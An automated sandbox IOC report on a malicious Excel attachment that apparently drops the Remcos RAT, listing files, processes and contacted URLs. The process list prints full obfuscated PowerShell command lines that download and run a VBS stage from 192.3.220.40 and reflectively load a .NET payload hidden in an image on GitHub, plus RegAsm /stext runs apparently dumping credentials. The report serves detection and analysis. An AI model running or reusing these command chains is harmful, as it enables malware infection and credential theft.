IOC Report
037002451082_10142024.xls

loading gif

Files

File Path
Type
Category
Malicious
037002451082_10142024.xls
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Oct 14 06:22:49 2024, Security: 1
initial sample
malicious
C:\ProgramData\remcos\logs.dat
data
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\networkthinkinggreatthingstobeenough[1].hta
HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
modified
malicious
C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
malicious
C:\Users\user\Desktop\037002451082_10142024.xls (copy)
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Oct 14 10:06:00 2024, Security: 1
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\seethebestpricewithgoodcookiesme[1].tiff
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2B555AA9.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2D50DAA.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5DDD6DA3.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6BB2114.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B2D88348.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FF5F096.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Temp\1gfcu5a3.m0x.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\RES3EB6.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Oct 14 09:05:53 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\RES8131.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Oct 14 09:06:10 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\baytxyi3.vxz.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\bhv8F64.tmp
Extensible storage engine DataBase, version 0x620, checksum 0x1f8f070d, page size 32768, DirtyShutdown, Windows version 6.1
dropped
C:\Users\user\AppData\Local\Temp\ftk5ompf.zvt.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\hcettl45.s5s.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\jdevsgkx.xgo.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\jj3fbras.2im.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\kfigqppl.s5a.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\kqsyfh00.s0u.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\lrugk233\CSC866FCE414411468EBBBEC22B5654CE3.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\lrugk233\lrugk233.0.cs
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (352)
dropped
C:\Users\user\AppData\Local\Temp\lrugk233\lrugk233.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\lrugk233\lrugk233.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\lrugk233\lrugk233.out
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
modified
C:\Users\user\AppData\Local\Temp\n55tten3.zim.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\osyqdozz.rni.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\pimcdet1.ihu.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\rheitgef.bqq.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\sgej4rnv.ehw.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\sknmngfy\CSCD0FFB283197417ABFDFF0C5A9D2FBA3.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.0.cs
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (352)
dropped
C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.out
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
modified
C:\Users\user\AppData\Local\Temp\tgkhu3pa.dnc.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\w0u2unns.4vq.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\yrecugakrnvunuylxcgmffi
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\zy5ppnwn.wi2.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\~DF3D1775BC0D61434C.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DFC58CC94B888EDF2D.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DFD20930BBBA1449A8.TMP
data
dropped
C:\Users\user\Desktop\7D330000
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Oct 14 10:06:00 2024, Security: 1
dropped
C:\Users\user\Desktop\7D330000:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
There are 40 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
malicious
C:\Windows\System32\mshta.exe
C:\Windows\System32\mshta.exe -Embedding
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.cmdline"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')"
malicious
C:\Windows\System32\mshta.exe
C:\Windows\System32\mshta.exe -Embedding
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lrugk233\lrugk233.cmdline"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yrecugakrnvunuylxcgmffi"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jurvurlefvnzyimponaoqrckug"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\toxfvjwftdfeaoitxynhtwpbdvhxj"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3EB6.tmp" "c:\Users\user\AppData\Local\Temp\sknmngfy\CSCD0FFB283197417ABFDFF0C5A9D2FBA3.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8131.tmp" "c:\Users\user\AppData\Local\Temp\lrugk233\CSC866FCE414411468EBBBEC22B5654CE3.TMP"
There are 12 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://192.3.220.40/450/seethebestpricewithgoodcookiesme.tIF
192.3.220.40
malicious
idabo.duckdns.org
malicious
https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg
185.199.108.133
malicious
http://192.3.220.40/450/ec/networkthinkinggreatthingstobeenough.hta
192.3.220.40
malicious
http://192.3.220.40/450/RRFCCE.txt
192.3.220.40
malicious
http://b.scorecardresearch.com/beacon.js
unknown
http://192.3.220.40/450/ec/networkthinkinggreatthingstobeenough.htaCKWWS
unknown
http://acdn.adnxs.com/ast/ast.js
unknown
http://192.3.220.40/viderI
unknown
http://www.imvu.comr
unknown
https://jfm.com.co/e
unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
unknown
http://192.3.220.40/450/ec/networkthinkinggreatthingstobeenough.htaccepC:
unknown
http://ocsp.entrust.net03
unknown
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
unknown
https://contoso.com/License
unknown
https://support.google.com/chrome/?p=plugin_flash
unknown
http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
unknown
http://www.diginotar.nl/cps/pkioverheid0
unknown
https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
unknown
http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
unknown
http://www.nirsoft.net
unknown
https://deff.nelreports.net/api/report?cat=msn
unknown
https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
unknown
http://go.micros
unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
unknown
http://cache.btrll.com/default/Pix-1x1.gif
unknown
http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
unknown
https://www.google.com
unknown
http://geoplugin.net/json.gp/C
unknown
https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpgX
unknown
http://o.aolcdn.com/ads/adswrappermsni.js
unknown
http://cdn.taboola.com/libtrc/msn-home-network/loader.js
unknown
http://www.msn.com/?ocid=iehp
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
unknown
http://static.chartbeat.com/js/chartbeat.js
unknown
http://www.msn.com/de-de/?ocid=iehp
unknown
http://192.3.220.40/450/ec/networkthinkinggreatthingstobeenough.hta1.1
unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
unknown
https://login.yahoo.com/config/login
unknown
http://www.nirsoft.net/
unknown
http://ocsp.entrust.net0D
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
